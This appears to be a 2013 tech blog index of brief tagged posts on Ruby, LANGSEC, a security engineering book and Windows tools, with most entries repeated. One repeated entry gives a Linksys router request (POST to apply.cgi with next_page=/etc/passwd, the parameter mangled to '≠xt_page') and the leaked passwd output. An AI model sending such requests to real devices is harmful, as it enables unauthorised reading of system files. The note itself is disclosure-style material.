April 14th, 2013 
				
				
					sometimes language makes a difference ( i.e ruby is too low for a service stack )				
		
				Posted in language, ror, ruby, scalability |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					Collection of great takes from Hacker News/YCombinator ppl. Full discussion https://news.ycombinator.com/item?id=5511466				
		
				Posted in technology, video |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					Collection of great takes from Hacker News/YCombinator ppl. Full discussion https://news.ycombinator.com/item?id=5511466				
		
				Posted in technology, video |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.				
		
				Posted in infosec, paper, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.				
		
				Posted in infosec, paper, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					Security Engineering , by Ross Andreson. ‘It's beautiful. This is the best book on the topic there is’ Bruce Schneier				
		
				Posted in book, engineering, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					Security Engineering , by Ross Andreson. ‘It's beautiful. This is the best book on the topic there is’ Bruce Schneier				
		
				Posted in book, engineering, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin				
		
				Posted in linksys, networking, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				April 14th, 2013 
				
				
					the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin				
		
				Posted in linksys, networking, Security |   Comments Off | permalink
 
				
				
			 
	
						
			
				
				March 27th, 2013 
				
				
					try this if you need a decent command line experience in windows				
		
				Posted in cmd, command-line, windows |   Comments Off | permalink